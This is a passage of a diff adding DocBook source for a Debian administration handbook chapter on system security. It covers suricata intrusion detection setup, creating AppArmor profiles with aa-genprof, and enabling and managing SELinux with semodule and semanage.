+        Configuring suricata involves reviewing and editing
+        <filename>/etc/suricata/suricata-debian.yaml</filename>, which is
+        very long because each parameter is abundantly commented.
+        A minimal configuration requires describing the range of addresses
+        that the local network covers (<literal>HOME_NET</literal>
+        parameter). In practice, this means the set of all potential
+        attack targets. But getting the most of it requires reading it in
+        full and adapting it to the local situation.
+      </para>
+      <para>
+        On top of this, you should also edit
+        <filename>/etc/default/suricata</filename> to define the network
+        interface to monitor and to enable the init script (by setting
+        <literal>RUN=yes</literal>). You might also want to set
+        <literal>LISTENMODE=pcap</literal> because the default
+        <literal>LISTENMODE=nfqueue</literal> requires further configuration
+        to work properly (the netfilter firewall must be configured to
+        pass packets to some user-space queue handled by suricata via the
+        <literal>NFQUEUE</literal> target).
+      </para>
+      <para>
+        To detect bad behaviour, <command>suricata</command> needs a set of
+        monitoring rules: you can find such rules in the
+        <emphasis role="pkg">snort-rules-default</emphasis> package.
+        <command>snort</command> is the historical reference in the IDS
+        ecosystem and <command>suricata</command> is able to reuse rules
+        written for it.  Unfortunately that package is missing from
+        <emphasis role="distribution">Debian Jessie</emphasis> and should
+        be retrieved from another Debian release like <emphasis role="distribution">Testing</emphasis> or <emphasis role="distribution">Unstable</emphasis>.
+      </para>
+      <para>
+        Alternatively, <command>oinkmaster</command> (in the package of the same name)
+        can be used to download Snort rulesets from external sources.
+      </para>
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> Integration with <command>prelude</command></title>
+
+	<para>Prelude brings centralized monitoring of security
+	information. Its modular architecture includes a server (the
+	<emphasis>manager</emphasis> in <emphasis role="pkg">prelude-manager</emphasis>) which gathers alerts
+	generated by <emphasis>sensors</emphasis> of various types.</para>
+
+	<para>Suricata can be configured as such a sensor. Other possibilities
+	include <emphasis>prelude-lml</emphasis> (<emphasis>Log Monitor
+	Lackey</emphasis>) which monitors log files (in a manner similar to
+	<command>logcheck</command>, described in <xref linkend="sect.logcheck" />).</para>
+        <indexterm><primary><command>prelude</command></primary></indexterm>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.apparmor">
+    <title>Introduction to AppArmor</title>
+    <indexterm><primary>AppArmor</primary></indexterm>
+    <section id="sect.apparmor-principles">
+      <title>Principles</title>
+      <para>
+        AppArmor is a <emphasis>Mandatory Access Control</emphasis> (MAC)
+        system built on Linux's LSM (<emphasis>Linux Security
+          Modules</emphasis>) interface. In practice, the kernel queries
+        AppArmor before each system call to know whether the process is
+        authorized to do the given operation. Through this mechanism, AppArmor
+        confines programs to a limited set of resources.
+      </para>
+      <indexterm><primary><emphasis>Mandatory Access Control</emphasis></primary></indexterm>
+      <indexterm><primary><emphasis>Linux Security Modules</emphasis></primary></indexterm>
+      <para>
+        AppArmor applies a set of rules (known as “profile”) on each
+        program. The profile applied by the kernel depends on the
+        installation path of the program being executed.
+        Contrary to SELinux (discussed in <xref linkend="sect.selinux" />),
+        the rules applied do not depend on the user. All users 
+        face the same set of rules when they are executing the same
+        program (but traditional user permissions still apply and
+        might result in different behaviour!).
+      </para>
+      <para>
+        AppArmor profiles are stored in <filename>/etc/apparmor.d/</filename>
+        and they contain a list of access control rules on resources that
+        each program can make use of.
+        The profiles are compiled and loaded into the kernel by the
+        <command>apparmor_parser</command> command. Each profile can
+        be loaded either in enforcing or complaining mode. The former
+        enforces the policy and reports violation attempts, while the
+        latter does not enforce the policy but still logs the system
+        calls that would have been denied.
+      </para>
+    </section>
+    <section id="sect.apparmor-setup">
+      <title>Enabling AppArmor and managing AppArmor profiles</title>
+      <para>
+        AppArmor support is built into the standard kernels provided by Debian.
+        Enabling AppArmor is thus just a matter of installing a few
+        packages and adding some parameters to the kernel command line:
+      </para>
+      <screen><computeroutput># </computeroutput><userinput>apt install apparmor apparmor-profiles apparmor-utils
+</userinput><computeroutput>[...]
+# </computeroutput><userinput>perl -pi -e 's,GRUB_CMDLINE_LINUX="(.*)"$,GRUB_CMDLINE_LINUX="$1 apparmor=1 security=apparmor",' /etc/default/grub
+</userinput><computeroutput># </computeroutput><userinput>update-grub
+</userinput></screen>
+      <para>
+        After a reboot, AppArmor is now functional and <command>aa-status</command>
+        will confirm it quickly:
+      </para>
+      <screen>
+<computeroutput># </computeroutput><userinput>aa-status</userinput>
+<computeroutput>apparmor module is loaded.
+44 profiles are loaded.
+9 profiles are in enforce mode.
+   /usr/bin/lxc-start
+   /usr/lib/chromium-browser/chromium-browser//browser_java
+[...]
+35 profiles are in complain mode.
+   /sbin/klogd
+[...]
+3 processes have profiles defined.
+1 processes are in enforce mode.
+   /usr/sbin/libvirtd (1295) 
+2 processes are in complain mode.
+   /usr/sbin/avahi-daemon (941) 
+   /usr/sbin/avahi-daemon (1000) 
+0 processes are unconfined but have a profile defined.</computeroutput>
+</screen>
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> More AppArmor profiles</title>
+        <para>
+          The <emphasis role="pkg">apparmor-profiles</emphasis> package
+          contains profiles managed by the upstream AppArmor community.
+          To get even more profiles you can install
+          <emphasis role="pkg">apparmor-profiles-extra</emphasis> which
+          contains profiles developed by Ubuntu and Debian.
+        </para>
+      </sidebar>
+      <para>
+        The state of each profile can be switched between
+        enforcing and complaining with calls to <command>aa-enforce</command>
+        and <command>aa-complain</command> giving as parameter either
+        the path of the executable or the path to the policy file.
+        Additionaly a profile can be entirely disabled with
+        <command>aa-disable</command> or put in audit mode (to log
+        accepted system calls too) with <command>aa-audit</command>.
+      </para>
+      <screen>
+<computeroutput># </computeroutput><userinput>aa-enforce /usr/sbin/avahi-daemon</userinput>
+<computeroutput>Setting /usr/sbin/avahi-daemon to enforce mode.</computeroutput>
+<computeroutput># </computeroutput><userinput>aa-complain /etc/apparmor.d/usr.bin.lxc-start</userinput>
+<computeroutput>Setting /etc/apparmor.d/usr.bin.lxc-start to complain mode.</computeroutput>
+      </screen>
+    </section>
+    <section id="sect.apparmor-new-profile">
+      <title>Creating a new profile</title>
+      <para>
+        Even though creating an AppArmor profile is rather easy, most
+        programs do not have one. This section will show you how to
+        create a new profile from scratch just by using the target
+        program and letting AppArmor monitor the system call it makes
+        and the resources it accesses.
+      </para>
+      <para>
+        The most important programs that need to be confined
+        are the network facing programs as those are the most likely
+        targets of remote attackers. That is why AppArmor conveniently
+        provides an <command>aa-unconfined</command> command to list
+        the programs which have no associated profile and which expose
+        an open network socket. With the <literal>--paranoid</literal>
+        option you get all unconfined processes that have at least one
+        active network connection.
+      </para>
+      <screen>
+<computeroutput># </computeroutput><userinput>aa-unconfined</userinput>
+<computeroutput>801 /sbin/dhclient not confined
+890 /sbin/rpcbind not confined
+899 /sbin/rpc.statd not confined
+929 /usr/sbin/sshd not confined
+941 /usr/sbin/avahi-daemon confined by '/usr/sbin/avahi-daemon (complain)'
+988 /usr/sbin/minissdpd not confined
+1276 /usr/sbin/exim4 not confined
+1485 /usr/lib/erlang/erts-6.2/bin/epmd not confined
+1751 /usr/lib/erlang/erts-6.2/bin/beam.smp not confined
+19592 /usr/lib/dleyna-renderer/dleyna-renderer-service not confined</computeroutput>
+      </screen>
+      <para>
+        In the following example, we will thus try to create a
+        profile for <command>/sbin/dhclient</command>. For this
+        we will use <command>aa-genprof dhclient</command>. It
+        will invite you to use the application in another window
+        and when done to come back to <command>aa-genprof</command>
+        to scan for AppArmor events in the system logs and
+        convert those logs into access rules. For each logged event,
+        it will make one or more rule suggestions that you can
+        either approve or further edit in multiple ways:
+      </para>
+      <screen>
+<computeroutput># </computeroutput><userinput>aa-genprof dhclient</userinput>
+<computeroutput>Writing updated profile for /sbin/dhclient.
+Setting /sbin/dhclient to complain mode.
+
+Before you begin, you may wish to check if a
+profile already exists for the application you
+wish to confine. See the following wiki page for
+more information:
+http://wiki.apparmor.net/index.php/Profiles
+
+Please start the application to be profiled in
+another window and exercise its functionality now.
+
+Once completed, select the "Scan" option below in 
+order to scan the system logs for AppArmor events. 
+
+For each AppArmor event, you will be given the 
+opportunity to choose whether the access should be 
+allowed or denied.
+
+Profiling: /sbin/dhclient
+
+[(S)can system log for AppArmor events] / (F)inish
+Reading log entries from /var/log/audit/audit.log.
+
+Profile:  /sbin/dhclient <co id="aa-genprof-execute"></co>
+Execute:  /usr/lib/NetworkManager/nm-dhcp-helper
+Severity: unknown
+
+(I)nherit / (C)hild / (P)rofile / (N)amed / (U)nconfined / (X) ix On / (D)eny / Abo(r)t / (F)inish
+<userinput>P</userinput>
+Should AppArmor sanitise the environment when
+switching profiles?
+
+Sanitising environment is more secure,
+but some applications depend on the presence
+of LD_PRELOAD or LD_LIBRARY_PATH.
+
+(Y)es / [(N)o]
+<userinput>Y</userinput>
+Writing updated profile for /usr/lib/NetworkManager/nm-dhcp-helper.
+Complain-mode changes:
+WARN: unknown capability: CAP_net_raw
+
+Profile:    /sbin/dhclient <co id="aa-genprof-capability"></co>
+Capability: net_raw
+Severity:   unknown
+
+[(A)llow] / (D)eny / (I)gnore / Audi(t) / Abo(r)t / (F)inish
+<userinput>A</userinput>
+Adding capability net_raw to profile.
+
+Profile:  /sbin/dhclient <co id="aa-genprof-read"></co>
+Path:     /etc/nsswitch.conf
+Mode:     r
+Severity: unknown
+
+  1 - #include &lt;abstractions/apache2-common&gt; 
+  2 - #include &lt;abstractions/libvirt-qemu&gt; 
+  3 - #include &lt;abstractions/nameservice&gt; 
+  4 - #include &lt;abstractions/totem&gt; 
+ [5 - /etc/nsswitch.conf]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<userinput>3</userinput>
+
+Profile:  /sbin/dhclient
+Path:     /etc/nsswitch.conf
+Mode:     r
+Severity: unknown
+
+  1 - #include &lt;abstractions/apache2-common&gt; 
+  2 - #include &lt;abstractions/libvirt-qemu&gt; 
+ [3 - #include &lt;abstractions/nameservice&gt;]
+  4 - #include &lt;abstractions/totem&gt; 
+  5 - /etc/nsswitch.conf 
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<userinput>A</userinput>
+Adding #include &lt;abstractions/nameservice&gt; to profile.
+
+Profile:  /sbin/dhclient
+Path:     /proc/7252/net/dev
+Mode:     r
+Severity: 6
+
+  1 - /proc/7252/net/dev 
+ [2 - /proc/*/net/dev]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<userinput>A</userinput>
+Adding /proc/*/net/dev r to profile
+
+[...]
+Profile:  /sbin/dhclient <co id="aa-genprof-write"></co>
+Path:     /run/dhclient-eth0.pid
+Mode:     w
+Severity: unknown
+
+ [1 - /run/dhclient-eth0.pid]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<userinput>N</userinput>
+
+Enter new path: /run/dhclient*.pid
+
+Profile:  /sbin/dhclient
+Path:     /run/dhclient-eth0.pid
+Mode:     w
+Severity: unknown
+
+  1 - /run/dhclient-eth0.pid 
+ [2 - /run/dhclient*.pid]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<userinput>A</userinput>
+Adding /run/dhclient*.pid w to profile
+
+[...]
+Profile:  /usr/lib/NetworkManager/nm-dhcp-helper <co id="aa-genprof-other-profile"></co>
+Path:     /proc/filesystems
+Mode:     r
+Severity: 6
+
+ [1 - /proc/filesystems]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<userinput>A</userinput>
+Adding /proc/filesystems r to profile
+
+= Changed Local Profiles =
+
+The following local profiles were changed. Would you like to save them?
+
+ [1 - /sbin/dhclient]
+  2 - /usr/lib/NetworkManager/nm-dhcp-helper 
+(S)ave Changes / Save Selec(t)ed Profile / [(V)iew Changes] / View Changes b/w (C)lean profiles / Abo(r)t
+<userinput>S</userinput>
+Writing updated profile for /sbin/dhclient.
+Writing updated profile for /usr/lib/NetworkManager/nm-dhcp-helper.
+
+Profiling: /sbin/dhclient
+
+[(S)can system log for AppArmor events] / (F)inish
+<userinput>F</userinput>
+Setting /sbin/dhclient to enforce mode.
+Setting /usr/lib/NetworkManager/nm-dhcp-helper to enforce mode.
+
+Reloaded AppArmor profiles in enforce mode.
+
+Please consider contributing your new profile!
+See the following wiki page for more information:
+http://wiki.apparmor.net/index.php/Profiles
+
+Finished generating profile for /sbin/dhclient.</computeroutput>
+</screen>
+      <para>
+        Note that the program does not display back the control
+        characters that you type but for the clarity of the explanation I
+        have included them in the previous transcript.
+      </para>
+      <calloutlist>
+        <callout arearefs="aa-genprof-execute">
+          <para>
+            The first event detected is the execution of another program.
+            In that case, you have multiple choices: you can run the program
+            with the profile of the parent process (the “Inherit” choice),
+            you can run it with its own dedicated profile (the
+            “Profile” and the “Named” choices, differing only by the
+            possibility to use an arbitrary profile name), you can run it
+            with a sub-profile of the parent process (the “Child” choice),
+            you can run it without any profile (the “Unconfined” choice)
+            or you can decide to not run it at all (the “Deny” choice).
+          </para>
+          <para>
+            Note that when you opt to run it under a dedicated profile
+            that doesn't exist yet, the tool will create the missing profile
+            for you and will make rule suggestions for that profile in the
+            same run.
+          </para>
+        </callout>
+        <callout arearefs="aa-genprof-capability">
+          <para>
+            At the kernel level, the special powers of the root user have been split
+            in “capabilities”. When a system call requires a specific capability,
+            AppArmor will verify whether the profile allows the program to make
+            use of this capability.
+          </para>
+        </callout>
+        <callout arearefs="aa-genprof-read">
+          <para>
+            Here the program seeks read permissions for
+            <filename>/etc/nsswitch.conf</filename>. <command>aa-genprof</command>
+            detected that this permission was also granted by multiple
+            “abstractions” and offers them as alternative choices. An
+            abstraction provides a reusable set of access rules grouping
+            together multiple resources that are commonly used together.
+            In this specific case, the file is generally accessed through
+            the nameservice related functions of the C library and we type
+            “3” to first select the “#include
+            &lt;abstractions/nameservice&gt;” choice and then “A” to allow
+            it.
+          </para>
+        </callout>
+        <callout arearefs="aa-genprof-write">
+          <para>
+            The program wants to create the <filename>/run/dhclient-eth0.pid</filename>
+            file. If we allow the creation of this specific file only, the program
+            will not work when the user will use it on another network interface.
+            Thus we select “New” to replace the filename with the more generic
+            “/run/dhclient*.pid” before recording the rule with “Allow”.
+          </para>
+        </callout>
+        <callout arearefs="aa-genprof-other-profile">
+          <para>
+            Notice that this access request is not part of the dhclient
+            profile but of the new profile that we created when we allowed
+            <filename>/usr/lib/NetworkManager/nm-dhcp-helper</filename> to
+            run with its own profile.
+          </para>
+          <para>
+            After having gone through all the logged events, the program
+            offers to save all the profiles that were created during the
+            run. In this case, we have two profiles that we save at once
+            with “Save” (but you can save them individually too) before
+            leaving the program with “Finish”.
+          </para>
+        </callout>
+      </calloutlist>
+      <para>
+        <command>aa-genprof</command> is in fact only a smart wrapper
+        around <command>aa-logprof</command>: it creates an empty profile,
+        loads it in complain mode and then run
+        <command>aa-logprof</command> which is a tool to update a profile
+        based on the profile violations that have been logged. So you can
+        re-run that tool later to improve the profile that you just
+        created.
+      </para>
+      <para>
+        If you want the generated profile to be complete, you should use the
+        program in all the ways that it is legitimately used. In the case
+        of dhclient, it means running it via Network Manager, running it via
+        ifupdown, running it manually, etc. In the end, you might get
+        a <filename>/etc/apparmor.d/sbin.dhclient</filename> close to this:
+      </para>
+      <programlisting>
+# Last Modified: Tue Sep  8 21:40:02 2015
+#include &lt;tunables/global&gt;
+
+/sbin/dhclient {
+  #include &lt;abstractions/base&gt;
+  #include &lt;abstractions/nameservice&gt;
+
+  capability net_bind_service,
+  capability net_raw,
+
+  /bin/dash r,
+  /etc/dhcp/* r,
+  /etc/dhcp/dhclient-enter-hooks.d/* r,
+  /etc/dhcp/dhclient-exit-hooks.d/* r,
+  /etc/resolv.conf.* w,
+  /etc/samba/dhcp.conf.* w,
+  /proc/*/net/dev r,
+  /proc/filesystems r,
+  /run/dhclient*.pid w,
+  /sbin/dhclient mr,
+  /sbin/dhclient-script rCx,
+  /usr/lib/NetworkManager/nm-dhcp-helper Px,
+  /var/lib/NetworkManager/* r,
+  /var/lib/NetworkManager/*.lease rw,
+  /var/lib/dhcp/*.leases rw,
+
+  profile /sbin/dhclient-script flags=(complain) {
+    #include &lt;abstractions/base&gt;
+    #include &lt;abstractions/bash&gt;
+
+    /bin/dash rix,
+    /etc/dhcp/dhclient-enter-hooks.d/* r,
+    /etc/dhcp/dhclient-exit-hooks.d/* r,
+    /sbin/dhclient-script r,
+
+  }
+}
+      </programlisting>
+    </section>
+  </section>
+
+  <section id="sect.selinux">
+    <title>Introduction to SELinux</title>
+    <indexterm><primary>SELinux</primary></indexterm>
+    <section id="sect.selinux-principles">
+      <title>Principles</title>
+
+      <para>SELinux (<emphasis>Security Enhanced Linux</emphasis>) is a
+      <emphasis>Mandatory Access Control</emphasis> system built on Linux's
+      LSM (<emphasis>Linux Security Modules</emphasis>) interface. In
+      practice, the kernel queries SELinux before each system call to know
+      whether the process is authorized to do the given operation.</para>
+
+      <para>SELinux uses a set of rules — collectively known as a
+      <emphasis>policy</emphasis> — to authorize or forbid operations.
+      Those rules are difficult to create. Fortunately, two standard
+      policies (<emphasis>targeted</emphasis> and
+      <emphasis>strict</emphasis>) are provided to avoid the bulk of the
+      configuration work.</para>
+
+      <para>With SELinux, the management of rights is completely different
+      from traditional Unix systems. The rights of a process depend on its
+      <emphasis>security context</emphasis>. The context is defined by the
+      <emphasis>identity</emphasis> of the user who started the process,
+      the <emphasis>role</emphasis> and the <emphasis>domain</emphasis>
+      that the user carried at that time. The rights really depend on the
+      domain, but the transitions between domains are controlled by the
+      roles. Finally, the possible transitions between roles depend on the
+      identity.</para>
+
+      <figure>
+        <title>Security contexts and Unix users</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/selinux-context.png" scalefit="1" width="65%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>In practice, during login, the user gets assigned a default
+      security context (depending on the roles that they should be able to
+      endorse). This defines the current domain, and thus the domain that
+      all new child processes will carry. If you want to change the current
+      role and its associated domain, you must call <command>newrole -r
+      <replaceable>role_r</replaceable> -t
+      <replaceable>domain_t</replaceable></command> (there's usually only a
+      single domain allowed for a given role, the <literal>-t</literal>
+      parameter can thus often be left out). This command authenticates you
+      by asking you to type your password. This feature forbids programs to
+      automatically switch roles. Such changes can only happen if they are
+      explicitly allowed in the SELinux policy.</para>
+
+      <para>Obviously the rights do not apply to all
+      <emphasis>objects</emphasis> (files, directories, sockets, devices,
+      etc.). They can vary from object to object. To achieve this, each
+      object is associated to a <emphasis>type</emphasis> (this is known as
+      labeling). Domains' rights are thus expressed with sets of
+      (dis)allowed operations on those types (and, indirectly, on all
+      objects which are labeled with the given type).</para>
+
+      <sidebar>
+        <title><emphasis>EXTRA</emphasis> Domains and types are equivalent</title>
+
+	<para>Internally, a domain is just a type, but a type that only
+	applies to processes. That's why domains are suffixed with
+	<literal>_t</literal> just like objects' types.</para>
+      </sidebar>
+
+      <para>By default, a program inherits its domain from the user who
+      started it, but the standard SELinux policies expect many important
+      programs to run in dedicated domains. To achieve this, those
+      executables are labeled with a dedicated type (for example
+      <command>ssh</command> is labeled with
+      <literal>ssh_exec_t</literal>, and when the program starts, it
+      automatically switches to the <literal>ssh_t</literal> domain). This
+      automatic domain transition mechanism makes it possible to grant only
+      the rights required by each program. It is a fundamental principle of
+      SELinux.</para>
+
+      <figure>
+        <title>Automatic transitions between domains</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/selinux-transitions.png" scalefit="1" width="35%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <sidebar>
+        <title><emphasis>IN PRACTICE</emphasis> Finding the security context</title>
+        <indexterm><primary>security context</primary></indexterm>
+        <indexterm><primary>context, security context</primary></indexterm>
+        <indexterm><primary>MCS (<emphasis>Multi-Category Security</emphasis>)</primary></indexterm>
+
+	<para>To find the security context of a given process, you should
+	use the <literal>Z</literal> option of
+	<command>ps</command>.</para>
+
+        <screen><computeroutput>$ </computeroutput><userinput>ps axZ | grep vstfpd</userinput>
+<computeroutput>system_u:system_r:ftpd_t:s0   2094 ?    Ss  0:00 /usr/sbin/vsftpd</computeroutput>
+</screen>
+
+	<para>The first field contains the identity, the role, the domain
+	and the MCS level, separated by colons. The MCS level
+	(<emphasis>Multi-Category Security</emphasis>) is a parameter that
+	intervenes in the setup of a confidentiality protection policy,
+	which regulates the access to files based on their sensitivity.
+	This feature will not be explained in this book.</para>
+
+	<para>To find the current security context in a shell, you should
+	call <command>id -Z</command>.</para>
+
+        <screen><computeroutput>$ </computeroutput><userinput>id -Z</userinput>
+<computeroutput>unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023</computeroutput>
+</screen>
+
+	<para>Finally, to find the type assigned to a file, you can use
+	<command>ls -Z</command>.</para>
+
+        <screen><computeroutput>$ </computeroutput><userinput>ls -Z test /usr/bin/ssh</userinput>
+<computeroutput>unconfined_u:object_r:user_home_t:s0 test
+     system_u:object_r:ssh_exec_t:s0 /usr/bin/ssh</computeroutput>
+</screen>
+
+	<para>It is worth noting that the identity and role assigned to a
+	file bear no special importance (they are never used), but for the
+	sake of uniformity, all objects get assigned a complete security
+	context.</para>
+      </sidebar>
+    </section>
+    <section id="sect.selinux-setup">
+      <title>Setting Up SELinux</title>
+
+      <para>SELinux support is built into the standard kernels provided by
+      Debian. The core Unix tools support SELinux without any
+      modifications. It is thus relatively easy to enable SELinux.</para>
+
+      <para>The <command>apt install selinux-basics
+      selinux-policy-default</command> command will automatically install
+      the packages required to configure an SELinux system.</para>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> Reference policy not in jessie</title>
+        <para>
+          Unfortunately the maintainers of the <emphasis role="pkg">refpolicy</emphasis> source package did not handle
+          release critical bugs on their package and the package got
+          removed from jessie. This means that the <emphasis role="pkg">selinux-policy-*</emphasis> packages are currently not
+          installable in jessie and need to be fetched from another
+          place. Hopefully they will come back in one of the point releases
+          or in jessie-backports. In the meantime, you can grab them
+          from unstable.
+        </para>
+        <para>
+          This sad situation at least proves that SELinux is not very popular
+          in the set of users/developers who are running the development
+          versions of Debian. Thus, if you opt to use SELinux, you
+          should expect the default policy to not work perfectly and
+          you will have to invest quite some time to make it suitable
+          to your specific needs.
+        </para>
+      </sidebar>
+
+      <para>The <emphasis role="pkg">selinux-policy-default</emphasis>
+      package contains a set of standard rules. By default, this policy
+      only restricts access for a few widely exposed services. The user
+      sessions are not restricted and it is thus unlikely that SELinux
+      would block legitimate user operations. However, this does enhance
+      the security of system services running on the machine. To setup a
+      policy equivalent to the old “strict” rules, you just have to
+      disable the <literal>unconfined</literal> module (modules management
+      is detailed further in this section).</para>
+
+      <para>Once the policy has been installed, you should label all the
+      available files (which means assigning them a type). This operation
+      must be manually started with <command>fixfiles
+      relabel</command>.</para>
+
+      <para>The SELinux system is now ready. To enable it, you should add
+      the <literal>selinux=1 security=selinux</literal> parameter to the Linux kernel. The
+      <literal>audit=1</literal> parameter enables SELinux logging which
+      records all the denied operations. Finally, the
+      <literal>enforcing=1</literal> parameter brings the rules into
+      application: without it SELinux works in its default
+      <emphasis>permissive</emphasis> mode where denied actions are logged
+      but still executed. You should thus modify the GRUB bootloader
+      configuration file to append the desired parameters. One easy way to
+      do this is to modify the <literal>GRUB_CMDLINE_LINUX</literal>
+      variable in <filename>/etc/default/grub</filename> and to run
+      <command>update-grub</command>. SELinux will be active after a
+      reboot.</para>
+
+      <para>It is worth noting that the <command>selinux-activate</command>
+      script automates those operations and forces a labeling on next boot
+      (which avoids new non-labeled files created while SELinux was not yet
+      active and while the labeling was going on).</para>
+    </section>
+    <section id="sect.selinux-management">
+      <title>Managing an SELinux System</title>
+      <indexterm><primary><command>semodule</command></primary></indexterm>
+      <indexterm><primary><command>semanage</command></primary></indexterm>
+
+      <para>The SELinux policy is a modular set of rules, and its
+      installation detects and enables automatically all the relevant
+      modules based on the already installed services. The system is thus
+      immediately operational. However, when a service is installed after
+      the SELinux policy, you must be able to manually enable the
+      corresponding module. That is the purpose of the
+      <command>semodule</command> command. Furthermore, you must be able to
+      define the roles that each user can endorse, and this can be done
+      with the <command>semanage</command> command.</para>
+
+      <para>Those two commands can thus be used to modify the current
+      SELinux configuration, which is stored in
+      <filename>/etc/selinux/default/</filename>. Unlike other
+      configuration files that you can find in <filename>/etc/</filename>,
+      all those files must not be changed by hand. You should use the
+      programs designed for this purpose.</para>
+
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> More documentation</title>
+
+	<para>Since the NSA doesn't provide any official documentation, the
+	community set up a wiki to compensate. It brings together a lot of
+	information, but you must be aware that most SELinux contributors
+	are Fedora users (where SELinux is enabled by default). The
+	documentation thus tends to deal specifically with that
+	distribution. <ulink type="block" url="http://www.selinuxproject.org" /></para>
+
+	<para>You should also have a look at the dedicated Debian wiki page
+	as well as Russell Coker's blog, who is one of the most active
+	Debian developers working on SELinux support. <ulink type="block" url="http://wiki.debian.org/SELinux" /> <ulink type="block" url="http://etbe.coker.com.au/tag/selinux/" /></para>
+      </sidebar>
+      <section>
+        <title>Managing SELinux Modules</title>
+
+	<para>Available SELinux modules are stored in the
+	<filename>/usr/share/selinux/default/</filename> directory. To
+	enable one of these modules in the current configuration, you
+	should use <command>semodule -i
+	<replaceable>module.pp.bz2</replaceable></command>. The
+	<emphasis>pp.bz2</emphasis> extension stands for <emphasis>policy
+	package</emphasis> (compressed with bzip2).</para>
+
+	<para>Removing a module from the current configuration is done with
+	<command>semodule -r <replaceable>module</replaceable></command>.
+	Finally, the <command>semodule -l</command> command lists the
+	modules which are currently installed. It also outputs their version
+        numbers. Modules can be selectively enabled with <command>semodule -e</command>
+        and disabled with <command>semodule -d</command>.</para>
+
+        <screen><computeroutput># </computeroutput><userinput>semodule -i /usr/share/selinux/default/abrt.pp.bz2</userinput>
+<computeroutput># </computeroutput><userinput>semodule -l</userinput>
+<computeroutput>abrt    1.5.0   Disabled
+accountsd       1.1.0   
+acct    1.6.0   
+[...]</computeroutput>
+<computeroutput># </computeroutput><userinput>semodule -e abrt</userinput>
+<computeroutput># </computeroutput><userinput>semodule -d accountsd</userinput>
+<computeroutput># </computeroutput><userinput>semodule -l</userinput>
+<computeroutput>abrt    1.5.0
+accountsd       1.1.0   Disabled
+acct    1.6.0   
+[...]</computeroutput>
+<computeroutput># </computeroutput><userinput>semodule -r abrt</userinput>
+<computeroutput># </computeroutput><userinput>semodule -l</userinput>
+<computeroutput>accountsd       1.1.0   Disabled
+acct    1.6.0   
+[...]</computeroutput>
+</screen>
+
+	<para><command>semodule</command> immediately loads the new
+	configuration unless you use its <literal>-n</literal> option. It
+	is worth noting that the program acts by default on the current
+	configuration (which is indicated by the
+	<literal>SELINUXTYPE</literal> variable in
+	<filename>/etc/selinux/config</filename>), but that you can modify
+	another one by specifying it with the <literal>-s</literal>
+	option.</para>
+      </section>
+      <section>
+        <title>Managing Identities</title>
+
+	<para>Every time that a user logs in, they get assigned an SELinux
+	identity. This identity defines the roles that they will be able to
+	endorse. Those two mappings (from the user to the identity and from
+	this identity to roles) are configurable with the
+	<command>semanage</command> command.</para>
+
+	<para>You should definitely read the
+	<citerefentry><refentrytitle>semanage</refentrytitle><manvolnum>8</manvolnum></citerefentry>
+	manual page, even if the command's syntax tends to be similar for
+	all the concepts which are managed. You will find common options to
+	all sub-commands: <literal>-a</literal> to add,
+	<literal>-d</literal> to delete, <literal>-m</literal> to modify,
+	<literal>-l</literal> to list, and <literal>-t</literal> to
+	indicate a type (or domain).</para>
+
+	<para><command>semanage login -l</command> lists the current
+	mapping between user identifiers and SELinux identities. Users that
+	have no explicit entry get the identity indicated in the
+	<literal>__default__</literal> entry. The <command>semanage login
+	-a -s user_u <replaceable>user</replaceable></command> command will
+	associate the <emphasis>user_u</emphasis> identity to the given
+	user. Finally, <command>semanage login -d
+	<replaceable>user</replaceable></command> drops the mapping entry
+	assigned to this user.</para>
+
+        <screen><computeroutput># </computeroutput><userinput>semanage login -a -s user_u rhertzog</userinput>
+<computeroutput># </computeroutput><userinput>semanage login -l</userinput>
+<computeroutput>
+Login Name           SELinux User         MLS/MCS Range        Service
+
+__default__          unconfined_u         SystemLow-SystemHigh *
+rhertzog             user_u               SystemLow            *
+root                 unconfined_u         SystemLow-SystemHigh *
+system_u             system_u             SystemLow-SystemHigh *
+# </computeroutput><userinput>semanage login -d rhertzog</userinput> 
+</screen>
+
+	<para><command>semanage user -l</command> lists the mapping between
+	SELinux user identities and allowed roles. Adding a new identity
+	requires to define both the corresponding roles and a labeling
+	prefix which is used to assign a type to personal files
+	(<filename>/home/<replaceable>user</replaceable>/*</filename>). The
+	prefix must be picked among <literal>user</literal>,
+	<literal>staff</literal>, and <literal>sysadm</literal>. The
+	“<literal>staff</literal>” prefix results in files of type
+	“<literal>staff_home_dir_t</literal>”. Creating a new SELinux
+	user identity is done with <command>semanage user -a -R
+	<replaceable>roles</replaceable> -P
+	<replaceable>prefix</replaceable>
+	<replaceable>identity</replaceable></command>. Finally, you can
+	remove an SELinux user identity with <command>semanage user -d
+	<replaceable>identity</replaceable></command>.</para>
+
+        <screen><computeroutput># </computeroutput><userinput>semanage user -a -R 'staff_r user_r' -P staff test_u</userinput>
+<computeroutput># </computeroutput><userinput>semanage user -l</userinput>
+<computeroutput>
+                Labeling   MLS/       MLS/                          
+SELinux User    Prefix     MCS Level  MCS Range             SELinux Roles
+
+root            sysadm     SystemLow  SystemLow-SystemHigh  staff_r sysadm_r system_r
+staff_u         staff      SystemLow  SystemLow-SystemHigh  staff_r sysadm_r
+sysadm_u        sysadm     SystemLow  SystemLow-SystemHigh  sysadm_r
